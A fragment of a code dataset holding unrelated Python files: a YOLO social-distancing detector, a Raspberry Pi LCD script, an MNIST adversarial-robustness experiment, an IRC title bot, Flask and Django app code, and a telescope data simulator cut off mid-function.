\"cellphone\", \"microwave\", \"oven\", \"toaster\", \"sink\", \"refrigerator\",\r\n \"book\", \"clock\", \"vase\", \"scissors\", \"teddybear\", \"hairdrier\", \"toothbrush\"]\r\n\r\n class_colors = [\"0,255,0\", \"0,0,255\", \"255,0,0\", \"255,255,0\", \"0,255,255\"]\r\n class_colors = [np.array(color.split(\",\").astype(\"int\") for color in class_colors)]\r\n class_colors = np.array(class_colors)\r\n class_colors = np.tile(class_colors,(16,1))\r\n\r\n yolo_model = cv2.dnn.readNetFromDarknet('C:/Users/hp/Desktop/Yolo/yolov3.cfg','C:/Users/hp/Desktop/Yolo/yolov3.weights')\r\n\r\n\r\n yolo_layers = yolo_model.getLayerNames()\r\n yolo_output_layer = [yolo_layers[yolo_layer[0] - 1] for yolo_layer in yolo_model.getUnconnectedOutLayers()]\r\n\r\n yolo_model.setInput(img_blob)\r\n\r\n objection_detection_layers = yolo_model.forward(yolo_output_layer)\r\n\r\n class_ids_list = []\r\n boxes_list = []\r\n confidences_list = []\r\n person_dict = dict()\r\n for objection_detection_layer in objection_detection_layers:\r\n for detection in objection_detection_layer:\r\n all_scores = detection[5:]\r\n predicted_class_id = np.argmax(all_scores)\r\n predicted_confidence = all_scores[predicted_class_id]\r\n\r\n if predicted_confidence > 0.20:\r\n bounding_box = detection[0:4]*np.array([img_width, img_height, img_width, img_height])\r\n (box_center_x_pt, box_center_y_pt, box_width, box_height) = bounding_box.astype(\"int\")\r\n start_x_pt = int(box_center_x_pt - (box_width / 2))\r\n start_y_pt = int(box_center_y_pt - (box_height / 2))\r\n\r\n class_ids_list.append(predicted_class_id)\r\n confidences_list.append(float(predicted_confidence))\r\n boxes_list.append([start_x_pt , start_y_pt, int(box_width), int(box_height)])\r\n\r\n max_values_ids = cv2.dnn.NMSBoxes(boxes_list, confidences_list, 0.5, 0.4)\r\n\r\n for max_values_id in max_values_ids:\r\n max_class_id = max_values_id[0]\r\n if (class_labels[class_ids_list[max_class_id]]==\"person\"):\r\n box = boxes_list[max_class_id]\r\n person_dict[max_class_id] = box[0]+(box[2]/2), box[1]+(box[3]/2), box[0], box[1], box[0]+(box[2]), box[1]+(box[3])\r\n\r\n red_id = []\r\n red_box = []\r\n\r\n for (id1, pt1), (id2, pt2) in combinations(person_dict.items(),2):\r\n dist = dist1((pt1[0]-pt2[0]), (pt1[1]-pt2[1]))\r\n if dist < 75.0:\r\n if id1 not in red_id:\r\n red_id.append(id1)\r\n red_box.append([pt1[2], pt1[3], pt1[4], pt1[5]])\r\n if id2 not in red_id:\r\n red_id.append(id2)\r\n red_box.append([pt2[2], pt2[3], pt2[4], pt2[5]])\r\n cv2.line(img_to_detect,(int(pt1[0]), int(pt1[1])), (int(pt2[0]), int(pt2[1])), (0,0,255),1,cv2.LINE_AA)\r\n\r\n for box in red_box:\r\n cv2.rectangle(img_to_detect,(box[0], box[1]), (box[2], box[3]),(0,0,255),1)\r\n for (id, pt) in person_dict.items():\r\n if id not in red_id:\r\n cv2.rectangle(img_to_detect, (pt[2], pt[3]), (pt[4], pt[5]), (0, 255, 0), 1)\r\n text = \"People at risk: %s\"% str(len(red_box))\r\n\r\n cv2.putText(img_to_detect, text, (10,25), cv2.FONT_HERSHEY_SIMPLEX, 1, (1,1,255), 2, cv2.LINE_AA)\r\n\r\n cv2.imshow(\"Detection Output\", img_to_detect)\r\n\r\n if (cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\n\r\nvideo_stream.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Social_distancing.py","file_name":"Social_distancing.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"31668681","text":"#!/usr/bin/python\n#show IP address on the LCD Plate at startup\n#\nimport subprocess\nimport time\nimport Adafruit_CharLCD as LCD\n\nlogfile = open(\"LCDDisplay.log\", 'a')\nlcd = LCD.Adafruit_CharLCDPlate()\nwhile True:\n\tIPaddr = subprocess.check_output(['hostname','-I'])\n\tif len(IPaddr) > 8:\n\t\tbreak\n\telse:\n\t\ttime.sleep(2)\nName = subprocess.check_output(['hostname']).strip()\ndisplayText = IPaddr + Name\ncurrentTime = \"Running @ \" + time.strftime(\"%c\") + \":\\n\"\nlogfile.write(currentTime)\nlogfile.write(displayText)\nlcd.clear()\nlcd.message(displayText)\nlogfile.close()\n","sub_path":"ipDisplay.py","file_name":"ipDisplay.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"504059082","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\n\nclass MNIST_Basic():\n \"\"\"\n Basic MNIST For Testing Adversarial Attacks\n \"\"\"\n def __init__(self, scope='basic', summaries_dir=None, learning_rate=1e-3):\n self.learning_rate = learning_rate\n self.scope = scope\n self.summary_writer=None\n with tf.variable_scope(scope):\n self._build_model()\n summary_dir = os.path.join(summaries_dir, \"summaries_{}\".format(scope))\n if summaries_dir:\n if not os.path.exists(summary_dir):\n os.makedirs(summary_dir)\n self.summary_writer = tf.summary.FileWriter(summary_dir)\n\n\n def _build_model(self):\n \"\"\"\n Builds tf graph\n \"\"\"\n\n # Input placeholder\n self.x = tf.placeholder(shape=[None, 784], dtype=tf.float32, name='x')\n # Target placeholder\n self.y = tf.placeholder(shape=[None, 10], dtype=tf.float32, name='y')\n \n # Fully connected layer, followed by output layer\n fc1 = tf.layers.dense(inputs=self.x, units=256, activation=tf.nn.relu)\n self.logits = tf.layers.dense(inputs=fc1, units=10)\n\n # Calculate loss\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.y))\n\n # Calculate grads for perturbation\n self.grads = tf.gradients(self.loss, self.x)\n\n # Optimize loss\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n self.train_op = self.optimizer.minimize(self.loss)\n\n # Find Accuracy\n correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n # Collect Summaries\n self.summaries = tf.summary.merge([\n tf.summary.scalar(\"Loss\", self.loss),\n tf.summary.scalar(\"Accuracy\", self.accuracy)\n ])\n \n def predict(self, sess, x_inp):\n \"\"\"\n Returns the logits of the prediction.\n Args:\n sess: Tensorflow Session\n x_inp: input\n \"\"\"\n return sess.run(self.logits, feed_dict={self.x: x_inp})\n\n def update(self, sess, x_inp, y_inp, global_step):\n \"\"\"\n Runs an update step.\n Args:\n sess: Tensorflow Session\n x_inp: input\n y_inp: correct outputs\n \"\"\"\n feed_dict = {self.x:x_inp, self.y:y_inp}\n summaries, accuracy, loss, gradient, _ = sess.run([self.summaries, self.accuracy, self.loss, self.grads, self.train_op], feed_dict=feed_dict)\n if self.summary_writer:\n self.summary_writer.add_summary(summaries, global_step=global_step)\n return accuracy, loss, gradient\n\n def get_gradients(self, sess, x_inp, y_inp, global_step):\n \"\"\"\n Returns gradients, accuracy and loss\n Args:\n sess: Tensorflow Session\n x_inp: input\n y_inp: correct outputs\n \"\"\"\n feed_dict = {self.x:x_inp, self.y:y_inp}\n accuracy, loss, gradient = sess.run([self.accuracy, self.loss, self.grads], feed_dict=feed_dict)\n return accuracy, loss, gradient\n\n# Training Variables\n# For storing model/saving summaries\nexperiment_dir = \"./experiments/\"\nif not os.path.exists(experiment_dir):\n os.makedirs(experiment_dir)\ncheckpoint_dir = os.path.join(experiment_dir, 'checkpoints')\ncheckpoint_path = checkpoint_path = os.path.join(checkpoint_dir, \"model\")\nif not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n# Learning constants\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 128\n\n# Adversarial constants\nepsilons = np.linspace(0.005, 0.5, 1000)\naccuracies = list()\nmodel = MNIST_Basic(scope=\"basic\", summaries_dir=experiment_dir, learning_rate=learning_rate)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n train = True\n\n saver = tf.train.Saver()\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n if latest_checkpoint:\n print(\"Loading Checkpoint \", latest_checkpoint)\n saver.restore(sess, latest_checkpoint)\n train = False\n\n step = 0\n\n if train:\n for epoch in range(training_epochs):\n saver.save(tf.get_default_session(), checkpoint_path)\n total_batch = int(mnist.train.num_examples / batch_size)\n\n for i in range(total_batch):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n model.update(sess, batch_x, batch_y, step)\n step += 1\n # Check if model works, should get accuracy of about .96 here\n test_x, test_y = mnist.test.images[:256], mnist.test.labels[:256]\n test_accuracy = model.update(sess, test_x, test_y, step)[0]\n print('Test Accuracy: ', test_accuracy)\n\n # Accuracy of unperturbed model\n test_x, test_y = mnist.test.images[:256], mnist.test.labels[:256]\n acc, loss, test_grad = model.get_gradients(sess, test_x, test_y, step)\n print(acc)\n\n for epsilon in tqdm(epsilons):\n # Accuracy of perterbed model\n test_x_2 = test_x + np.sign(test_grad)[0] * epsilon\n acc, loss, test_grad = model.get_gradients(sess, test_x_2, test_y, step)\n accuracies.append(acc)\n","sub_path":"shallowMNIST/shallowmnist.py","file_name":"shallowmnist.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"389660487","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport re\nimport html.parser\nimport json\nfrom urllib.request import urlopen\n\nimport doctor\nfrom doctor import message\n\nTitlePattern = re.compile(b'(.*?)<\\/title>', re.I | re.S)\nYouTubePattern = re.compile('https?://(www\\.)?(youtube\\.com/.+(\\?|&)v=|youtu\\.be/)([a-zA-Z0-9\\-_]{10,13})', re.I)\nURLPattern = re.compile('((http|ftp|https):\\/\\/[\\w\\-_]+(\\.[\\w\\-_]+)+([\\w\\-\\.,@?^=%&:/~\\+#]*[\\w\\-\\@?^=%&/~\\+#])?)', re.I)\nMediaPattern = re.compile('(png|jpg|bmp|gif|avi|mpg|flv|3gp|mp4|exe|msi|mp3|flac|tar\\.gz|tar\\.bz2)$', re.I)\n\ndef read_page(url, amount=0):\n page = b''\n if not amount:\n try: page = urlopen(url, timeout = 2.0).read()\n except: pass\n else:\n try: page = urlopen(url, timeout = 2.0).read(amount)\n except: pass\n\n return page\n\ndef title(url):\n youtube = YouTubePattern.match(url)\n\n if youtube:\n page = read_page('http://gdata.youtube.com/feeds/videos/%s?alt=json' % youtube.group(4)).decode('utf-8')\n result = json.loads(page)['entry']\n\n return '(\\x0310%s\\x03) %s' % (\n result['media$group']['media$category'][0]['label'], \n result['title']['$t']\n )\n else:\n if MediaPattern.match(url): return\n\n page = read_page(url, 1024)\n title = TitlePattern.search(page)\n \n if title:\n h = html.parser.HTMLParser()\n title = h.unescape(title.groups(0)[0].decode('utf-8')).strip().replace('\\n', ' ').replace('\\r', '')\n\n return title\n return\n\n@message\ndef message(network, user, channel, msg):\n match = re.search(URLPattern, msg)\n if match:\n url = match.groups(0)[0]\n text = title(url)\n\n if text:\n channel.say(text)\n\n","sub_path":"scripts/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"257266759","text":"import os\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef save_image(path, success, is_resize, end_frame):\r\n \r\n cnt=0\r\n while success:\r\n successs,image= vidcap.read()\r\n if is_resize==1:\r\n image2= cv2.resize(image,(800,400))\r\n else:\r\n image2=image\r\n \r\n file_path = os.path.join(path, \"frame%.5d.jpg\" % cnt )\r\n cv2.imwrite(file_path, image2)\r\n cnt+=1\r\n \r\n print(\"%d image done \" %cnt)\r\n \r\n if cnt== end_frame:\r\n break\r\n\r\nend_frame = 400\r\n\r\nprint(\"save resize image\")\r\nvidcap = cv2.VideoCapture('Frames/mov1.mp4')\r\nsuccess, image = vidcap.read()\r\nsave_image('Frames/jpg', success, 1, end_frame)\r\n\r\nprint(\"save original image\")\r\nvidcap = cv2.VideoCapture('Frames/mov1.mp4')\r\nsuccess, image = vidcap.read()\r\nsave_image('Frames/jpg_ori', success, 0, end_frame)\r\n \r\n \r\n \r\n ","sub_path":"mp4_image.py","file_name":"mp4_image.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"251279734","text":"# Lucas Hanson - Homework 2 - Problem 1\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\n\nled1 = 17\nled2 = 27\nled3 = 22\n\nGPIO.setup(led1,GPIO.OUT)\nGPIO.setup(led2,GPIO.OUT)\nGPIO.setup(led3,GPIO.OUT)\n\nwhile True:\n\tselection = int(input(\"Please enter a number between 1 and 3: \"))\n\tif selection == 1:\n\t\tGPIO.output(led1,True)\n\t\ttime.sleep(5.0)\n\telif selection == 2:\n\t\tGPIO.output(led1,True)\n\t\tGPIO.output(led2,True)\n\t\ttime.sleep(5.0)\n\telif selection == 3:\n\t\tGPIO.output(led1,True)\n\t\tGPIO.output(led2,True)\n\t\tGPIO.output(led3,True)\n\t\ttime.sleep(5.0)\n\telif selection > 3:\n\t\tprint(\"Error, number out of range\")\n\telif selection < 1:\n\t\tprint(\"Error, number out of range\")\n\t\n","sub_path":"HW1_P1.py","file_name":"HW1_P1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42829615","text":"from flask import Flask, render_template, url_for, request\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\n\napp = Flask(__name__)\n\n@app.route('/',methods=['POST','GET'])\ndef index():\n return render_template(\"menu.html\")\n\n@app.route(\"/predictor\",methods=[\"POST\",\"GET\"])\ndef predictor():\n def predictor(array, clase):\n df = pd.read_csv('dataset/data_features.csv')\n df1 = pd.read_csv('dataset/data_'+str(clase)+'.csv')\n # Drop the animal names since this is not a good feature to split the data on\n dataset = df.drop(\"ESPECIE\", axis=1)\n # Split the data into features and target\n features = dataset.drop('FAMILIA', axis=1)\n targets = dataset['FAMILIA']\n # Split the data into a training and a testing set\n train_features, test_features, train_targets, test_targets = train_test_split(features, targets, train_size=0.80)\n # Train the model\n tree= DecisionTreeClassifier(criterion=\"entropy\")\n tree= tree.fit(train_features, train_targets)\n # Make prediction\n features = pd.DataFrame(data=None,columns=df.columns ).drop(['ESPECIE','FAMILIA'], axis=1)\n features.loc[len(df)] = array\n prediction = tree.predict(features)[0]\n # Obtain species\n species = df1.loc[df1['FAMILIA'].apply(lambda x: x.lower()) == prediction]\n return species\n\n if request.method == 'POST':\n \n clase = request.form['clase']\n theria = int(request.form['theria']) if request.form['theria'] != \"\" else 0 \n eutheria = int(request.form['eutheria']) if request.form['eutheria'] != \"\" else 0 \n metatheria = int(request.form['metatheria']) if request.form['metatheria'] != \"\" else 0 \n neognathae = int(request.form['neognathae']) if request.form['neognathae'] != \"\" else 0 \n paleognathae = int(request.form['paleognathae']) if request.form['paleognathae'] != \"\" else 0 \n carnivora = int(request.form['carnivora']) if request.form['carnivora'] != \"\" else 0 \n artiodactyla = int(request.form['artiodactyla']) if request.form['artiodactyla'] != \"\" else 0 \n rodentia = int(request.form['rodentia']) if request.form['rodentia'] != \"\" else 0 \n chiroptera = int(request.form['chiroptera']) if request.form['chiroptera'] != \"\" else 0 \n cingulata = int(request.form['cingulata']) if request.form['cingulata'] != \"\" else 0 \n primates = int(request.form['primates']) if request.form['primates'] != \"\" else 0 \n perissodactyla = int(request.form['perissodactyla']) if request.form['perissodactyla'] != \"\" else 0 \n didelphimorphia = int(request.form['didelphimorphia']) if request.form['didelphimorphia'] != \"\" else 0 \n lagomorpha = int(request.form['lagomorpha']) if request.form['lagomorpha'] != \"\" else 0 \n paucituberculata = int(request.form['paucituberculata']) if request.form['paucituberculata'] != \"\" else 0 \n pilosa = int(request.form['pilosa']) if request.form['pilosa'] != \"\" else 0 \n apodiformes = int(request.form['apodiformes']) if request.form['apodiformes'] != \"\" else 0 \n tinamiformes = int(request.form['tinamiformes']) if request.form['tinamiformes'] != \"\" else 0 \n anseriformes = int(request.form['anseriformes']) if request.form['anseriformes'] != \"\" else 0 \n galliformes = int(request.form['galliformes']) if request.form['galliformes'] != \"\" else 0 \n phoenicopteriformes = int(request.form['phoenicopteriformes']) if request.form['phoenicopteriformes'] != \"\" else 0 \n podicipediformes = int(request.form['podicipediformes']) if request.form['podicipediformes'] != \"\" else 0 \n columbiformes = int(request.form['columbiformes']) if request.form['columbiformes'] != \"\" else 0 \n cuculiformes = int(request.form['cuculiformes']) if request.form['cuculiformes'] != \"\" else 0 \n caprimulgiformes = int(request.form['caprimulgiformes']) if request.form['caprimulgiformes'] != \"\" else 0 \n opisthocomiformes = int(request.form['opisthocomiformes']) if request.form['opisthocomiformes'] != \"\" else 0 \n gruiformes = int(request.form['gruiformes']) if request.form['gruiformes'] != \"\" else 0 \n charadriiformes = int(request.form['charadriiformes']) if request.form['charadriiformes'] != \"\" else 0 \n sphenisciformes = int(request.form['sphenisciformes']) if request.form['sphenisciformes'] != \"\" else 0 \n procellariiformes = int(request.form['procellariiformes']) if request.form['procellariiformes'] != \"\" else 0 \n ciconiiformes = int(request.form['ciconiiformes']) if request.form['ciconiiformes'] != \"\" else 0 \n strigiformes = int(request.form['strigiformes']) if request.form['strigiformes'] != \"\" else 0 \n trogoniformes = int(request.form['trogoniformes']) if request.form['trogoniformes'] != \"\" else 0 \n coraciiformes = int(request.form['coraciiformes']) if request.form['coraciiformes'] != \"\" else 0 \n galbuliformes = int(request.form['galbuliformes']) if request.form['galbuliformes'] != \"\" else 0 \n falconiformes = int(request.form['falconiformes']) if request.form['falconiformes'] != \"\" else 0 \n psittaciformes = int(request.form['psittaciformes']) if request.form['psittaciformes'] != \"\" else 0 \n\n array = []\n array.append(theria)\n array.append(eutheria)\n array.append(metatheria)\n array.append(neognathae)\n array.append(paleognathae)\n array.append(carnivora)\n array.append(artiodactyla)\n array.append(rodentia)\n array.append(chiroptera)\n array.append(cingulata)\n array.append(primates)\n array.append(perissodactyla)\n array.append(didelphimorphia)\n array.append(lagomorpha)\n array.append(paucituberculata)\n array.append(pilosa)\n array.append(apodiformes)\n array.append(tinamiformes)\n array.append(anseriformes)\n array.append(galliformes)\n array.append(phoenicopteriformes)\n array.append(podicipediformes)\n array.append(columbiformes)\n array.append(cuculiformes)\n array.append(caprimulgiformes)\n array.append(opisthocomiformes)\n array.append(gruiformes)\n array.append(charadriiformes)\n array.append(sphenisciformes)\n array.append(procellariiformes)\n array.append(ciconiiformes)\n array.append(strigiformes)\n array.append(trogoniformes)\n array.append(coraciiformes)\n array.append(galbuliformes)\n array.append(falconiformes)\n array.append(psittaciformes)\n\n df = predictor(array, clase)\n return render_template(\"predictor.html\", tables=[df.to_html(classes=\"table table-dark\", header=\"true\")])\n else:\n return render_template(\"predictor.html\")\n \n\n@app.route(\"/clasificador\",methods=[\"POST\"])\ndef clasificador():\n return render_template(\"clasificador.html\")\n\n\nif __name__ == \"__main__\" :\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"16252368","text":"\"\"\"Manages operations to save manual calls\"\"\"\nfrom datetime import datetime\nfrom campaigns.models import AnswersHeader\nfrom agent_console.models import Calls, Campaign, Agent\nfrom campaigns.models import DataLlamada, CampaignForm\n\n\ndef create_call(request, answer_header_id):\n answer_header = AnswersHeader.objects.get(pk=answer_header_id)\n if answer_header.call_id is None:\n request_data = request.data.copy()\n data_llamada = DataLlamada.objects.get(pk=request_data.get(\"data_llamada\"))\n campaign_form = CampaignForm.objects.get(pk=request_data.get(\"campaign\"))\n new_call = Calls()\n new_call.id_campaign = Campaign(campaign_form.isabel_campaign)\n new_call.phone = data_llamada.telefono\n new_call.agent = request_data.get('agent')\n new_call.retries = 0\n new_call.status = \"Success\"\n new_call.fecha_llamada = datetime.now()\n new_call.start_time = datetime.now()\n new_call.end_time = datetime.now()\n new_call.duration = 0\n new_call.dnc = 0\n new_call.date_init = datetime.today()\n new_call.date_end = datetime.today()\n new_call.time_init = datetime.now()\n new_call.time_end = datetime.now()\n new_call.datetime_entry_queue = datetime.today()\n new_call.scheduled = 0\n new_call.save()\n answer_header.call_id = new_call.id\n answer_header.campaign = campaign_form\n answer_header.data_llamada = data_llamada\n answer_header.save()\n","sub_path":"campaigns/business_logic/manual_calls.py","file_name":"manual_calls.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"44934243","text":"from django.conf import settings\nfrom django.urls import path\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.VacanciesView.as_view()),\n path(\"vacancies/\", views.VacanciesListAPIView.as_view()),\n path(\"/\", views.VacanciesDetailView.as_view()),\n path(\"vacancies/\", views.VacanciesDetailAPIView.as_view()),\n path(\"request/\", views.RequestCreateView.as_view()),\n path(\"practice/\", views.AddPracticeView.as_view()),\n path(\"practice/\", views.DeletePracticeView.as_view()),\n]\n\nif settings.DEBUG:\n urlpatterns +=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"careers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"382711959","text":"import re\nfrom Tagger.config import BLACK_LIST_TERMS\n\nBRACKETS = [\"\\(\", \"\\)\", \"\\[\", \"\\]\", \"{\", \"}\"]\nCOMMON_DELIMETERS = [\",\", \"-\", \"_\"]\n\n# any bracket / space followed by [Ff]t/eat/eaturing followed by optional .\nFEATURING = [\"[\" + \"\".join(BRACKETS) + \" \" + \"]\" + \"[Ff](?:eaturing|eat|t)\\.?\"]\nDELIMETER_STRING = \"|\".join(FEATURING + BRACKETS + COMMON_DELIMETERS)\nDELIMETERS = re.compile(DELIMETER_STRING)\n\n\ndef filter_black_listed_terms(term):\n return term.lower() not in BLACK_LIST_TERMS\n\n\ndef chunk_filename(filename):\n \"\"\"Takes a filename and return a list of terms\"\"\"\n return filter(filter_black_listed_terms,\n [\n term.strip() for\n term in re.split(DELIMETERS, filename) if term\n ])\n","sub_path":"Tagger/chunker.py","file_name":"chunker.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"312013225","text":"import argparse\nimport json\nimport numpy as np\nimport os\nimport random\nimport sys\n\nimport astroplan\n\nfrom astroplan import Observer\nfrom astropy import units as u\nfrom astropy.coordinates import EarthLocation\nfrom astropy.coordinates import SkyCoord\nfrom astropy.coordinates.angles import Angle\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pocs.utils.google.storage import PanStorage\n\n\n#############################################################################\n# This class is a simulator that is designed to simulate larger quantities #\n# of data, more accurate in the levels of data products than #\n# generate_data_network.py (which has more realistic star data). Use this #\n# to simulate large quantities of data to test the pipeline. Should #\n# eventually be merged with generate_data_network.py. #\n#############################################################################\n\nclass DataGenerator(object):\n\n \"\"\"Class to generate a network of simulated PANOPTES images and light curves\n\n Now just a wrapper class, should be updated to abstract out other objects eventually\n \"\"\"\n\n def __init__(self, storage=None, local_dir=None, use_cloud=False):\n if use_cloud and not storage:\n storage = PanStorage(bucket_name='panoptes-simulated-data')\n if not local_dir:\n local_dir = '/tmp/sim-data'\n self.storage = storage\n self.cameras = defaultdict(list)\n self.star_dict = {}\n self.unit_dict = {}\n self.local_dir = local_dir\n\n def generate_network(self, num_units, start_date, end_date, use_cloud):\n \"\"\"Generate simulated data from a network of PANOPTES units.\n\n :param num_units: the number of units to simulate\n :param start_date: the start date of observations\n :param end_date: the end date of observations\n \"\"\"\n start_date = datetime.strptime(start_date, \"%Y-%m-%d\")\n end_date = datetime.strptime(end_date, \"%Y-%m-%d\")\n num_nights = (end_date - start_date).days + 1\n if end_date < start_date:\n raise ValueError('End date must be after start date.')\n\n units = []\n if use_cloud:\n units = self.get_current_network()\n\n if len(units) == 0:\n print(\"Simulating new data network from {} units over {} nights. This make take \"\n \"a few minutes...\".format(num_units, num_nights), file=sys.stdout)\n units = self.init_units(num_units)\n else:\n num_units = len(units)\n self.update_cameras()\n print('Adding new simulated data to current network of {} units over {} nights. This may '\n 'take a few minutes...'.format(num_units, num_nights), file=sys.stdout)\n\n # For every night, let every unit observe a few stars, and\n # output a Postage Stamp Cube (PSC) and light curve for each star.\n lc_count = 0\n curr_date = start_date\n while curr_date <= end_date:\n for unit in units:\n\n # Start first sequence 1-2 hours after sunset\n site = self.unit_dict[unit]\n loc = Observer.at_site(site)\n sunset = loc.sun_set_time(\n Time(curr_date, scale='utc'), which='next')\n sunset_time = datetime.strptime(\n sunset.isot, \"%Y-%m-%dT%H:%M:%S.%f\")\n last_obs_end_time = sunset_time + \\\n timedelta(minutes=(random.random() * 60 + 60))\n sequences_per_night = random.randint(4, 6)\n for i in range(sequences_per_night):\n\n stars_per_sequence = random.randint(100, 200)\n start_time, end_time = self.set_obs_time(last_obs_end_time)\n last_obs_end_time = end_time\n\n for j in range(stars_per_sequence):\n\n # Get observation information\n field = self.get_field()\n pic, coords = self.get_fake_pic()\n\n for camera in self.cameras[unit]:\n psc_filename = \"PSC/{}/{}/{}/{}.fits\".format(\n unit, camera, start_time.isoformat(), pic)\n lc_filename = \"LC/{}/{}/{}/{}.json\".format(pic, unit, camera,\n start_time.isoformat())\n\n # Create data products\n hdu = self.build_psc(unit, camera, field,\n pic, coords, start_time, end_time)\n lc = self.build_lightcurve(hdu)\n\n # Write data products to local temp files\n self.write_psc(\n \"{}/{}\".format(self.local_dir, psc_filename), hdu)\n self.write_lightcurve(\n \"{}/{}\".format(self.local_dir, lc_filename), lc)\n\n # Upload data products from local files to cloud\n if use_cloud:\n self.storage.upload(\n \"{}/{}\".format(self.local_dir, psc_filename), remote_path=psc_filename)\n self.storage.upload(\n \"{}/{}\".format(self.local_dir, lc_filename), remote_path=lc_filename)\n lc_count += 1\n\n print('{}|LC{}| {}/{} observed star {} on {}.'.format(\n datetime.now().time(), lc_count, unit, camera, pic, curr_date.strftime('%Y-%m-%d')))\n\n stars_per_night = sequences_per_night * stars_per_sequence\n print('{} {} observed {} stars on {}.'.format(\n datetime.now().time(), unit, stars_per_night, curr_date.strftime('%Y-%m-%d')))\n curr_date = curr_date + timedelta(days=1)\n\n def init_units(self, num_units):\n \"\"\"Initialize a network of new units and their cameras, assigning unique IDs.\"\"\"\n units = []\n for i in range(num_units):\n unit = \"PAN{:03d}\".format(i)\n site = random.choice(EarthLocation.get_site_names())\n self.unit_dict[unit] = site\n self.init_cameras(unit)\n units.append(unit)\n return units\n\n def get_current_network(self):\n \"\"\"Get the units and their cameras that currently have simulated data on the cloud.\"\"\"\n units = []\n files = self.storage.list_remote(prefix='LC')\n for fl in files:\n dirs = fl.split('/')\n for i in range(len(dirs)):\n dir = dirs[i]\n if dir.startswith('PAN'):\n unit = dir\n if unit not in units:\n units.append(unit)\n site = random.choice(EarthLocation.get_site_names())\n self.unit_dict[unit] = site\n cam = dirs[i + 1]\n if cam not in self.cameras[unit]:\n self.cameras[unit].append(cam)\n break\n return units\n\n def init_cameras(self, unit):\n \"\"\"Set the camera IDs of the unit.\n\n :param unit: id of the unit\n \"\"\"\n cams_per_unit = 2\n for i in range(cams_per_unit):\n self.add_new_camera(unit)\n\n def add_new_camera(self, unit):\n \"\"\"Add a new camera for the unit.\n\n Select a unique random camera id (first 6 digits of serial number.)\n If collisions occur too many times, raise an exception.\n :param: unit: the unit id to add a camera for\n \"\"\"\n attempts = 0\n same = True\n while same:\n same = False\n cam = \"{:06d}\".format(random.randint(0, 999999))\n for un in self.cameras:\n for c in self.cameras[un]:\n if cam == c:\n same = True\n if attempts > 100:\n raise Exception(\"Can't find unique camera ID.\")\n attempts += 1\n self.cameras[unit].append(cam)\n return cam\n\n def update_cameras(self):\n \"\"\"Update the camera dictionary after getting current data network from cloud\"\"\"\n for unit in self.cameras:\n while len(self.cameras[unit]) < 2:\n self.add_new_camera(unit)\n\n def get_field(self):\n \"\"\"Return random (very fake) field name from list.\"\"\"\n fields = ['field_x', 'field_y', 'field_z']\n return random.choice(fields)\n\n def get_fake_pic(self):\n \"\"\"Generate a fake Panoptes Input Catalog star and random coordinates.\"\"\"\n pic = \"PIC_{:06d}\".format(random.randint(0, 50))\n if pic in self.star_dict:\n coords = self.star_dict[pic]\n else:\n ra = Angle((random.random() * 360) * u.deg)\n dec = Angle((random.random() * 180 - 90) * u.deg)\n coords = SkyCoord(ra.to(u.degree), dec.to(u.degree), frame='fk5')\n self.star_dict[pic] = coords\n return pic, coords\n\n def set_obs_time(self, last_obs_end_time):\n \"\"\"Choose times to begin and end observing the PIC between its rise and set.\n\n :param coords: coordinates of the PIC object from SkyCoord\n :param site: name of the site the unit is at, from astroplan\n :param date: the date of the observation\n :return: randomized start and end time of observation\n \"\"\"\n # Set 0-10 minute buffer between end of last observation and start of\n # new observation\n buffer_new_obs = timedelta(minutes=random.random() * 10)\n start_time = last_obs_end_time + buffer_new_obs\n # Random 